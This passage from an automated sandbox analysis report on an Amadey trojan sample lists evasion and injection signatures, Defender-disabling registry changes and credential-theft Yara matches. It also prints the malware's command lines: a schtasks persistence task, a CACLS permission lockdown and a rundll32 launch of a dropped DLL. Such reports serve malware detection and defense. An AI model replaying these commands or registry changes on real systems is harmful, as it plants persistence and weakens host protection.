                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5992Thread sleep count: 47 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1332Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exe TID: 4840Thread sleep count: 189 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exe TID: 4840Thread sleep time: -189000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-24623
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-24363
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2575
                          Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2444
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeAPI coverage: 6.9 %
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 50000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeAPI call chain: ExitProcess graph end nodegraph_2-24625
                          Source: xriv.exe, 0000000B.00000002.318710664.0000000001688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00EB5467
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00EB2390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00942390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00942390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0137FC58 FindFirstFileExW,11_2_0137FC58
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00EB202A
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0066092B mov eax, dword ptr fs:[00000030h]2_2_0066092B
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00660D90 mov eax, dword ptr fs:[00000030h]2_2_00660D90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00857C33 push dword ptr fs:[00000030h]2_2_00857C33
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0137A9A1 mov eax, dword ptr fs:[00000030h]11_2_0137A9A1
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0137CFB2 mov eax, dword ptr fs:[00000030h]11_2_0137CFB2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0040ADB0 GetProcessHeap,HeapFree,2_2_0040ADB0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB6F40 SetUnhandledExceptionFilter,0_2_00EB6F40
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00EB6CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00946F40 SetUnhandledExceptionFilter,1_2_00946F40
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00946CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00946CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0066D070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0066D070
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0066E883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0066E883
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_006771D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_006771D1
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00672658 SetUnhandledExceptionFilter,2_2_00672658
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01377A74 SetUnhandledExceptionFilter,11_2_01377A74
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0137790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0137790F
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0137BB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0137BB20
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01377208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_01377208

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_013638C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,11_2_013638C0
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB17EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00EB17EE
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: GetLocaleInfoA,2_2_00417A20
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: GetLocaleInfoA,2_2_00677C87
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01377AFC cpuid 11_2_01377AFC
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB7176 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00EB7176
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01383C76 _free,_free,_free,GetTimeZoneInformation,_free,11_2_01383C76
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeCode function: 6_2_00007FFC9D7D077D GetUserNameA,6_2_00007FFC9D7D077D
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00EB2BFB

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 12.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.xriv.exe.1360000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.file.exe.4a7e820.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.0.xriv.exe.1360000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.file.exe.4a7e820.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001C.00000000.478665181.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000000.315712522.0000000001361000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.774886747.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.332316282.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000000.735906035.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000000.329538528.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000002.736447784.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000002.607631806.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000000.607288773.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000002.352687909.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.479520127.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000000.352170413.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000000.318048617.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.775069911.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.775069911.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 22.2.rundll32.exe.6d0c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts3
                          Native API
                          1
                          Windows Service
                          2
                          Bypass User Access Control
                          21
                          Disable or Modify Tools
                          1
                          Input Capture
                          2
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          Exfiltration Over Other Network Medium14
                          Ingress Tool Transfer
                          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                          System Shutdown/Reboot
                          Default Accounts2
                          Command and Scripting Interpreter
                          1
                          Scheduled Task/Job
                          1
                          Access Token Manipulation
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop Protocol1
                          Input Capture
                          Exfiltration Over Bluetooth2
                          Encrypted Channel
                          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain Accounts1
                          Scheduled Task/Job
                          1
                          Registry Run Keys / Startup Folder
                          1
                          Windows Service
                          2
                          Obfuscated Files or Information
                          Security Account Manager2
                          File and Directory Discovery
                          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                          Non-Application Layer Protocol
                          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local Accounts1
                          Service Execution
                          1
                          Services File Permissions Weakness
                          111
                          Process Injection
                          2
                          Software Packing
                          NTDS36
                          System Information Discovery
                          Distributed Component Object ModelInput CaptureScheduled Transfer113
                          Application Layer Protocol
                          SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon Script1
                          Scheduled Task/Job
                          1
                          Timestomp
                          LSA Secrets131
                          Security Software Discovery
                          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.common1
                          Registry Run Keys / Startup Folder
                          2
                          Bypass User Access Control
                          Cached Domain Credentials21
                          Virtualization/Sandbox Evasion
                          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup Items1
                          Services File Permissions Weakness
                          1
                          Masquerading
                          DCSync2
                          Process Discovery
                          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                          Virtualization/Sandbox Evasion
                          Proc Filesystem1
                          System Owner/User Discovery
                          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                          Access Token Manipulation
                          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)111
                          Process Injection
                          Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                          Services File Permissions Weakness
                          Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                          Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                          Rundll32
                          KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 800799 Sample: file.exe Startdate: 07/02/2023 Architecture: WINDOWS Score: 100 65 Snort IDS alert for network traffic 2->65 67 Multi AV Scanner detection for domain / URL 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 9 other signatures 2->71 9 file.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 5 other processes 2->16 process3 file4 55 C:\Users\user\AppData\Local\Temp\...\xriv.exe, PE32 9->55 dropped 57 C:\Users\user\AppData\Local\Temp\...\bfCg.exe, PE32 9->57 dropped 18 bfCg.exe 1 4 9->18         started        22 xriv.exe 3 9->22         started        process5 file6 49 C:\Users\user\AppData\Local\Temp\...\nika.exe, PE32 18->49 dropped 51 C:\Users\user\AppData\Local\Temp\...\afCf.exe, PE32 18->51 dropped 73 Multi AV Scanner detection for dropped file 18->73 75 Machine Learning detection for dropped file 18->75 24 afCf.exe 9 1 18->24         started        27 nika.exe 1 1 18->27         started        53 C:\Users\user\AppData\Local\...\mnolyk.exe, PE32 22->53 dropped 77 Contains functionality to inject code into remote processes 22->77 29 mnolyk.exe 18 22->29         started        signatures7 process8 dnsIp9 79 Detected unpacking (changes PE section rights) 24->79 81 Detected unpacking (overwrites its own PE header) 24->81 83 Disable Windows Defender notifications (registry) 24->83 85 Disable Windows Defender real time protection (registry) 24->85 63 62.204.41.4, 49718, 49719, 49720 TNNET-ASTNNetOyMainnetworkFI United Kingdom 29->63 59 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 29->59 dropped 61 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 29->61 dropped 87 Multi AV Scanner detection for dropped file 29->87 89 Creates an undocumented autostart registry key 29->89 91 Machine Learning detection for dropped file 29->91 93 Uses schtasks.exe or at.exe to add and modify task schedules 29->93 33 cmd.exe 1 29->33         started        35 schtasks.exe 1 29->35         started        37 rundll32.exe 29->37         started        file10 signatures11 process12 process13 39 conhost.exe 33->39         started        41 cmd.exe 1 33->41         started        43 cmd.exe 1 33->43         started        47 4 other processes 33->47 45 conhost.exe 35->45         started       

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          file.exe67%ReversingLabsWin32.Trojan.Amadey
                          file.exe49%VirustotalBrowse
                          file.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe100%Joe Sandbox ML
